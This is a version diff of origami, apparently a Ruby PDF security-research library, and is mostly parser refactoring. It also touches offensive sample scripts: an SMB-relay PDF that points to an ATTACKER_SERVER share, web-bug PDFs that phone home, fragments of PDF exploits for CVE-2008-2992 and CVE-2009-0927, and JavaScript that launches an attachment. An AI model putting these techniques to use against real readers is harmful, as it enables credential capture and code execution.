origami 1.2.5 → 1.2.6

data/lib/origami/parsers/pdf/linear.rb

@@ -78,6 +78,7 @@ module Origami
 
         parse_finalize(pdf)
       end
+
     end
   end
 end

data/lib/origami/parsers/pdf.rb

@@ -71,6 +71,16 @@ module Origami
       def parse_finalize(pdf) #:nodoc:
         warn "This file has been linearized." if pdf.is_linearized?
 
+        if Origami::OPTIONS[:enable_type_propagation]
+          info "...Propagating types..."
+          @deferred_casts.each_pair do |ref, type|
+            type = [ type ] unless type.is_a?(::Array)
+            type.each do |hint|
+              pdf.cast_object(ref, hint)
+            end
+          end
+        end
+
         #
         # Decrypt encrypted file contents
         #

data/lib/origami/pdf.rb

@@ -65,75 +65,6 @@ require 'origami/parsers/pdf'
 
 module Origami
 
-  VERSION   = "1.2.5"
-  REVISION  = "$Revision: rev 167/, 2013/01/28 11:59:28 $" #:nodoc:
-  
-  #
-  # Global options for Origami.
-  #
-  OPTIONS   = 
-  {
-    :enable_type_checking => true,  # set to false to disable type consistency checks during compilation.
-    :enable_type_guessing => true,  # set to false to prevent the parser to guess the type of special dictionary and streams (not recommended).
-    :use_openssl => true            # set to false to use Origami crypto backend.
-  }
-  
-  begin
-    require 'openssl'
-    OPTIONS[:use_openssl] = true
-  rescue LoadError
-    OPTIONS[:use_openssl] = false
-  end
-
-  DICT_SPECIAL_TYPES = #:nodoc:
-  { 
-    :Catalog => Catalog, 
-    :Pages => PageTreeNode, 
-    :Page => Page, 
-    :Filespec => FileSpec, 
-    :Action => Action,
-    :Font => Font,
-    :FontDescriptor => FontDescriptor,
-    :Encoding => Encoding,
-    :Annot => Annotation,
-    :Border => Annotation::BorderStyle,
-    :Outlines => Outline,
-    :OutputIntent => OutputIntent,
-    :Sig => Signature::DigitalSignature,
-    :SigRef => Signature::Reference,
-    :SigFieldLock => Field::SignatureLock,
-    :SV => Field::SignatureSeedValue,
-    :SVCert => Field::CertificateSeedValue,
-    :ExtGState => Graphics::ExtGState,
-    :RichMediaSettings => Annotation::RichMedia::Settings,
-    :RichMediaActivation => Annotation::RichMedia::Activation,
-    :RichMediaDeactivation => Annotation::RichMedia::Deactivation,
-    :RichMediaAnimation => Annotation::RichMedia::Animation,
-    :RichMediaPresentation => Annotation::RichMedia::Presentation,
-    :RichMediaWindow => Annotation::RichMedia::Window,
-    :RichMediaPosition => Annotation::RichMedia::Position,
-    :RichMediaContent => Annotation::RichMedia::Content,
-    :RichMediaConfiguration => Annotation::RichMedia::Configuration,
-    :RichMediaInstance => Annotation::RichMedia::Instance,
-    :RichMediaParams => Annotation::RichMedia::Parameters,
-    :CuePoint => Annotation::RichMedia::CuePoint
-  }
-  
-  STM_SPECIAL_TYPES = #:nodoc:
-  {
-    :ObjStm => ObjectStream, 
-    :EmbeddedFile => EmbeddedFileStream,
-    :Metadata => MetadataStream,
-    :XRef => XRefStream,
-    :"3D" => U3DStream
-  }
-  
-  STM_XOBJ_SUBTYPES = #:nodoc:
-  {
-    :Image => Graphics::ImageXObject,
-    :Form => Graphics::FormXObject
-  }
-
   class InvalidPDFError < Exception #:nodoc:
   end
 	
@@ -201,6 +132,7 @@ module Origami
         yield(pdf) if block_given?
         pdf.save(output, options)
       end
+      alias write create
       
       #
       # Deserializes a PDF dump.
@@ -305,7 +237,7 @@ module Origami
       
       self
     end
-    alias saveas save
+    alias write save
     
     #
     # Saves the file up to given revision number.
@@ -680,6 +612,14 @@ module Origami
     end
 
     alias :[] :get_object
+
+    def cast_object(reference, type) #:nodoc:
+      @revisions.each do |rev|
+        if rev.body.include?(reference) and type < rev.body[reference].class
+          rev.body[reference] = rev.body[reference].cast_to(type)
+        end
+      end
+    end
   
     #
     # Returns a new number/generation for future object.

data/lib/origami/reference.rb

@@ -46,7 +46,7 @@ module Origami
       @refno, @refgen = refno, refgen
     end
     
-    def self.parse(stream) #:nodoc:
+    def self.parse(stream, parser = nil) #:nodoc:
 
       offset = stream.pos
       
@@ -64,7 +64,6 @@ module Origami
     end
     
     def solve
-      
       pdfdoc = self.pdf
 
       if pdfdoc.nil?
@@ -73,11 +72,11 @@ module Origami
       
       target = pdfdoc.get_object(self)
       
-      if target.nil?
+      if target.nil? and not Origami::OPTIONS[:ignore_bad_references]
         raise InvalidReferenceError, "Cannot resolve reference : #{self.to_s}"
       end
 
-      target
+      target or Null.new
     end
     
     def eql?(ref) #:nodoc
@@ -110,7 +109,7 @@ module Origami
       self
     end
 
-    def real_type ; Reference end
+    def self.native_type ; Reference end
 
   end
 

data/lib/origami/signature.rb

@@ -23,7 +23,12 @@
 
 =end
 
-require 'openssl'
+begin
+  require 'openssl' if Origami::OPTIONS[:use_openssl]
+rescue LoadError
+  Origami::OPTIONS[:use_openssl] = false
+end 
+
 require 'digest/sha1'
 
 module Origami
@@ -40,6 +45,11 @@ module Origami
     #   If no argument is passed, embedded certificates are treated as trusted.
     #
     def verify(options = {})
+
+      unless Origami::OPTIONS[:use_openssl]
+        fail "OpenSSL is not present or has been disabled."
+      end
+
       params =
       {
         :trusted => []
@@ -261,9 +271,13 @@ module Origami
     # Returns whether the document contains a digital signature.
     #
     def is_signed?
-      not self.Catalog.AcroForm.nil? and 
-      self.Catalog.AcroForm.has_key?(:SigFlags) and 
-      (self.Catalog.AcroForm.SigFlags & InteractiveForm::SigFlags::SIGNATURESEXIST != 0)
+      begin
+        self.Catalog.AcroForm.is_a?(Dictionary) and 
+        self.Catalog.AcroForm.has_key?(:SigFlags) and 
+        (self.Catalog.AcroForm.SigFlags & InteractiveForm::SigFlags::SIGNATURESEXIST != 0)
+      rescue InvalidReferenceError
+        false
+      end
     end
     
     #
@@ -272,15 +286,15 @@ module Origami
     #
     def enable_usage_rights(cert, pkey, *rights)
       
+      unless Origami::OPTIONS[:use_openssl]
+        fail "OpenSSL is not present or has been disabled."
+      end
+      
       signfield_size = lambda{|crt, key, ca|
         datatest = "abcdefghijklmnopqrstuvwxyz"
         OpenSSL::PKCS7.sign(crt, key, datatest, ca, OpenSSL::PKCS7::DETACHED | OpenSSL::PKCS7::BINARY).to_der.size + 128
       }
       
-      unless Origami::OPTIONS[:use_openssl]
-        fail "OpenSSL is not present or has been disabled."
-      end
-      
       #
       # Load key pair
       #

data/lib/origami/stream.rb

@@ -44,6 +44,8 @@ module Origami
     @@regexp_open = Regexp.new(WHITESPACES + TOKENS.first)
     @@regexp_close = Regexp.new(TOKENS.last)
 
+    @@cast_fingerprints = {}
+
     #
     # Actually only 5 first ones are implemented, other ones are mainly about image data processing (JPEG, JPEG2000 ... )
     #
@@ -114,9 +116,9 @@ module Origami
       end
     end
     
-    def self.parse(stream) #:nodoc:
+    def self.parse(stream, parser = nil) #:nodoc:
       
-      dictionary = Dictionary.parse(stream)
+      dictionary = Dictionary.parse(stream, parser)
       return dictionary if not stream.skip(@@regexp_open)
 
       length = dictionary[:Length]
@@ -141,23 +143,7 @@ module Origami
        
       stm = 
         if Origami::OPTIONS[:enable_type_guessing]
-          type, subtype = dictionary[:Type], dictionary[:Subtype]
-          
-          if type.is_a?(Name)
-            if STM_SPECIAL_TYPES.include?(type.value)
-              STM_SPECIAL_TYPES[type.value].new("", dictionary.to_h)
-            else
-              if type == :XObject and subtype.is_a?(Name) and STM_XOBJ_SUBTYPES.include?(subtype.value)
-                STM_XOBJ_SUBTYPES[subtype.value].new("", dictionary.to_h)
-              else
-                Stream.new('', dictionary.to_h)
-              end
-            end
-                    
-          else
-            Stream.new('', dictionary.to_h)
-          end
-
+          self.guess_type(dictionary).new('', dictionary.to_h)
         else
           Stream.new('', dictionary.to_h)
         end
@@ -179,6 +165,28 @@ module Origami
       stm
     end   
 
+    def self.add_type_info(typeclass, key, value) #:nodoc:
+      if not @@cast_fingerprints.has_key?(typeclass) and typeclass.superclass != Stream and
+         @@cast_fingerprints.has_key?(typeclass.superclass)
+        @@cast_fingerprints[typeclass] = @@cast_fingerprints[typeclass.superclass].dup
+      end
+
+      @@cast_fingerprints[typeclass] ||= {}
+      @@cast_fingerprints[typeclass][key.to_o] = value.to_o
+    end
+
+    def self.guess_type(hash) #:nodoc:
+      best_type = Stream
+
+      @@cast_fingerprints.each_pair do |typeclass, keys|
+        best_type = typeclass if keys.all? { |k,v| 
+          hash.has_key?(k) and hash[k] == v 
+        } and typeclass < best_type
+      end
+
+      best_type
+    end
+
     def set_predictor(predictor, colors = 1, bitspercomponent = 8, columns = 1)
       
       filters = self.Filter
@@ -201,6 +209,19 @@ module Origami
       self
     end
 
+    def cast_to(type)
+      super(type)
+
+      cast = type.new("", self.dictionary.to_h)
+      cast.rawdata = @rawdata.dup
+      cast.no, cast.generation = self.no, self.generation
+      cast.set_indirect(true) 
+      cast.set_pdf(self.pdf) 
+      cast.file_offset = self.file_offset
+
+      cast
+    end
+
     def value #:nodoc:
       self
     end
@@ -344,7 +365,7 @@ module Origami
       @dictionary.each_key(&b)
     end
   
-    def real_type ; Stream end
+    def self.native_type ; Stream end
 
     private
 

data/lib/origami/string.rb

@@ -114,12 +114,20 @@ module Origami
 
     end
 
-    include Origami::Object
+    module ClassMethods #:nodoc:all
+      def native_type; Origami::String end
+    end
 
-    attr_accessor :encoding
+    def self.included(receiver) #:nodoc:
+      receiver.extend(ClassMethods)
+    end
     
-    def real_type ; Origami::String end
+    def self.native_type; Origami::String end #:nodoc:
 
+    include Origami::Object
+    
+    attr_accessor :encoding
+    
     def initialize(str) #:nodoc:
       infer_encoding  
       super(str)
@@ -196,7 +204,7 @@ module Origami
       super(str)
     end
     
-    def self.parse(stream) #:nodoc:
+    def self.parse(stream, parser = nil) #:nodoc:
 
       offset = stream.pos
         
@@ -233,6 +241,7 @@ module Origami
 
       to_str
     end
+
   end
  
   class InvalidByteStringObjectError < InvalidObjectError #:nodoc:
@@ -263,7 +272,7 @@ module Origami
       super(str)
     end
 
-    def self.parse(stream) #:nodoc:
+    def self.parse(stream, parser = nil) #:nodoc:
 
       offset = stream.pos
       
@@ -385,7 +394,7 @@ module Origami
       super(date_str)
     end
     
-    def self.parse(stream) #:nodoc:
+    def self.parse(stream, parser = nil) #:nodoc:
       
       dateReg = Regexp.new(REGEXP_TOKEN)
       

data/lib/origami/trailer.rb

@@ -83,6 +83,10 @@ module Origami
   class InvalidTrailerError < Exception #:nodoc:
   end
 
+  # Forward declarations.
+  class Catalog < Dictionary; end
+  class Metadata < Dictionary; end
+
   #
   # Class representing a PDF file Trailer.
   #
@@ -103,9 +107,9 @@ module Origami
 
     field   :Size,      :Type => Integer, :Required => true
     field   :Prev,      :Type => Integer
-    field   :Root,      :Type => Dictionary, :Required => true
+    field   :Root,      :Type => Catalog, :Required => true
     field   :Encrypt,   :Type => Dictionary
-    field   :Info,      :Type => Dictionary
+    field   :Info,      :Type => Metadata
     field   :ID,        :Type => Array
     field   :XRefStm,   :Type => Integer
 
@@ -119,10 +123,10 @@ module Origami
       @startxref, self.dictionary = startxref, dictionary && Dictionary.new(dictionary)
     end
     
-    def self.parse(stream) #:nodoc:
+    def self.parse(stream, parser = nil) #:nodoc:
      
       if stream.skip(@@regexp_open)
-        dictionary = Dictionary.parse(stream)
+        dictionary = Dictionary.parse(stream, parser)
       else 
         dictionary = nil
       end
@@ -152,7 +156,7 @@ module Origami
       dict.parent = self if dict
       @dictionary = dict
     end
-    
+   
     def has_dictionary?
       not @dictionary.nil?
     end

data/lib/origami.rb

@@ -30,6 +30,25 @@ if RUBY_VERSION < '1.9'
   end
 end
 
+module Origami
+  VERSION   = "1.2.6"
+  REVISION  = "$Revision$" #:nodoc:
+  
+  #
+  # Global 
+  # options for Origami.
+  #
+  OPTIONS   = 
+  {
+    :enable_type_checking => true,      # set to false to disable type consistency checks during compilation.
+    :enable_type_guessing => true,      # set to false to prevent the parser to guess the type of special dictionary and streams (not recommended).
+    :enable_type_propagation => true,   # set to false to prevent the parser to propagate type from parents to children.
+    :use_openssl => true,               # set to false to use Origami crypto backend.
+    :ignore_bad_references => false,    # set to interpret invalid references as Null objects, instead of raising an exception.
+    :ignore_zlib_errors => false,       # set to true to ignore exceptions on invalid Flate streams.
+  }
+end
+
 require 'origami/pdf'
 require 'origami/extensions/fdf'
 require 'origami/extensions/ppklite'

data/samples/actions/loop/loopgoto.rb

@@ -15,7 +15,7 @@ index = 1
 pages = pdf.pages
 
 pages.each do |page|
-  page.onOpen(Action::GoTo.new(Destination::GlobalFit.new pages[index % pages.size].reference))
+  page.onOpen Action::GoTo Destination::GlobalFit.new pages[index % pages.size]
 
   index = index + 1
 end

data/samples/actions/loop/loopnamed.rb

@@ -14,8 +14,8 @@ pdf = PDF.read("sample.pdf", :verbosity => Parser::VERBOSE_DEBUG )
 pages = pdf.pages
 
 pages.each do |page| 
-  page.onOpen(Action::Named.new(Action::Named::NEXTPAGE)) unless page == pages.last
+  page.onOpen Action::Named::NEXTPAGE  unless page == pages.last
 end
-pages.last.onOpen(Action::Named.new(Action::Named::FIRSTPAGE))
+pages.last.onOpen Action::Named::FIRSTPAGE 
 
 pdf.save("loopnamed_sample.pdf")

data/samples/actions/named/named.rb

@@ -24,7 +24,7 @@ contents.write OUTPUTFILE,
 page.Contents = contents
 pdf.append_page(page)
 
-pdf.onDocumentOpen Action::Named.new(Action::Named::PRINT)
+pdf.onDocumentOpen Action::Named::PRINT
 
 pdf.save(OUTPUTFILE)
 

data/samples/actions/samba/smbrelay.rb

@@ -19,7 +19,7 @@ ATTACKER_SERVER = "localhost"
 pdf = PDF.read(ARGV[0])
 
 dst = ExternalFile.new("\\\\#{ATTACKER_SERVER}\\origami\\owned.pdf")
-gotor = Action::GoToR.new(dst, Destination::GlobalFit.new(0), true)
+gotor = Action::GoToR[dst, Destination::GlobalFit.new(0), true]
 pdf.pages.first.onOpen(gotor)
 
 pdf.save("#{File.basename($0, '.rb')}.pdf")

data/samples/actions/triggerevents/trigger.rb

@@ -23,19 +23,19 @@ contents.write "Pass your mouse over the yellow square",
 
 page.setContents( contents )
 
-onpageopen = Action::JavaScript.new "app.alert('Page Opened');"
-onpageclose = Action::JavaScript.new "app.alert('Page Closed');"
-ondocumentopen = Action::JavaScript.new "app.alert('Document is opened');"
-ondocumentclose = Action::JavaScript.new "app.alert('Document is closing');"
-onmouseover =Action::JavaScript.new "app.alert('Mouse over');"
-onmouseleft =Action::JavaScript.new "app.alert('Mouse left');"
-onmousedown = Action::JavaScript.new "app.alert('Mouse down');"
-onmouseup = Action::JavaScript.new "app.alert('Mouse up');"
-onparentopen = Action::JavaScript.new "app.alert('Parent page has opened');"
-onparentclose = Action::JavaScript.new "app.alert('Parent page has closed');"
-onparentvisible = Action::JavaScript.new "app.alert('Parent page is visible');"
-onparentinvisible = Action::JavaScript.new "app.alert('Parent page is no more visible');"
-namedscript = Action::JavaScript.new "app.alert('Names directory script');"
+onpageopen = Action::JavaScript "app.alert('Page Opened');"
+onpageclose = Action::JavaScript "app.alert('Page Closed');"
+ondocumentopen = Action::JavaScript "app.alert('Document is opened');"
+ondocumentclose = Action::JavaScript "app.alert('Document is closing');"
+onmouseover = Action::JavaScript "app.alert('Mouse over');"
+onmouseleft = Action::JavaScript "app.alert('Mouse left');"
+onmousedown = Action::JavaScript "app.alert('Mouse down');"
+onmouseup = Action::JavaScript "app.alert('Mouse up');"
+onparentopen = Action::JavaScript "app.alert('Parent page has opened');"
+onparentclose = Action::JavaScript "app.alert('Parent page has closed');"
+onparentvisible = Action::JavaScript "app.alert('Parent page is visible');"
+onparentinvisible = Action::JavaScript "app.alert('Parent page is no more visible');"
+namedscript = Action::JavaScript "app.alert('Names directory script');"
 
 pdf.onDocumentOpen(ondocumentopen)
 pdf.onDocumentClose(ondocumentclose)

data/samples/actions/webbug/webbug-browser.rb

@@ -61,7 +61,7 @@ page = Page.new.setContents( contents )
 pdf.append_page(page)
 
 # Starting action
-pdf.onDocumentOpen Action::URI.new(URL)
+pdf.onDocumentOpen Action::URI[URL]
 
 pdf.save(OUTPUTFILE)
 

data/samples/actions/webbug/webbug-js.rb

@@ -56,7 +56,7 @@ page.Contents = contents
 pdf.append_page(page)
 
 # Create a new action based on the script, compressed with zlib
-jsaction = Action::JavaScript.new( Stream.new(jscript,:Filter => :FlateDecode) )
+jsaction = Action::JavaScript Stream.new(jscript,:Filter => :FlateDecode) 
 
 # Add the script into the document names dictionary. Any scripts registered here will be executed at the document opening (with no OpenAction implied).
 pdf.register(Names::Root::JAVASCRIPT, "Update", jsaction)

data/samples/actions/webbug/webbug-reader.rb

@@ -78,7 +78,7 @@ pdf.append_page( page )
 flags = Action::SubmitForm::Flags::EXPORTFORMAT|Action::SubmitForm::Flags::GETMETHOD
 
 # Sends the form at the document opening.
-pdf.onDocumentOpen Action::SubmitForm.new(URL, [], flags)
+pdf.onDocumentOpen Action::SubmitForm[URL, [], flags]
 
 # Comments:
 #  - any port can be specified http://url:1234

data/samples/attachments/attach.rb

@@ -29,10 +29,10 @@ contents.write "File attachment sample",
 
 pdf.append_page Page.new.setContents(contents)
 
-js = <<JS
+pdf.onDocumentOpen Action::JavaScript <<JS
   this.exportDataObject({cName:"README.txt", nLaunch:2});
 JS
-pdf.onDocumentOpen Action::JavaScript.new(js)
+
 
 pdf.save(OUTPUTFILE)
 

data/samples/exploits/cve-2008-2992-utilprintf.rb

@@ -81,7 +81,7 @@ util.printf("%45000f",num);
 
 |
 
-exploit = Action::JavaScript.new(Stream.new(jscript))
+exploit = Action::JavaScript Stream.new(jscript)
 pdf.onDocumentOpen( exploit )
 pdf.save("#{File.basename($0, '.rb')}.pdf")
 

data/samples/exploits/cve-2009-0927-geticon.rb

@@ -58,7 +58,7 @@ Collab.getIcon(buffer+'_N.bundle');
 spary();
 |
 
-exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
+exploit = Action::JavaScript Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode])
 pdf.pages.first.onOpen( exploit )
 
 pdf.save("#{File.basename($0, '.rb')}.pdf")

data/samples/exploits/exploit_customdictopen.rb

@@ -47,8 +47,8 @@ function start()
 //# milw0rm.com [2009-04-29]
 |
 
-#exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
-exploit = Action::JavaScript.new(Stream.new(jscript))
+#exploit = Action::JavaScript Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode])
+exploit = Action::JavaScript Stream.new(jscript)
 pdf.onDocumentOpen( exploit )
 
 pdf.save("#{File.basename($0, '.rb')}.pdf")

data/samples/exploits/getannots.rb

@@ -55,7 +55,7 @@ function start()
 |
 
 #exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
-exploit = Action::JavaScript.new(Stream.new(jscript))
+exploit = Action::JavaScript Stream.new(jscript)
 pdf.onDocumentOpen( exploit )
 
 

data/samples/javascript/js.rb

@@ -23,12 +23,12 @@ if defined?(PDF::JavaScript::Engine)
   )
 
   # Example of JS payload
-  js = <<-JS
+  pdf.onDocumentOpen Action::JavaScript <<-JS
     if ( app.viewerVersion == 8 )
       eval("this.exportDataObject({cName:'README.txt', nLaunch:2});");
     this.closeDoc();
   JS
-  pdf.onDocumentOpen Action::JavaScript.new(js)
+  
 
   # Tweaking the engine options
   pdf.js_engine.options[:log_method_calls] = true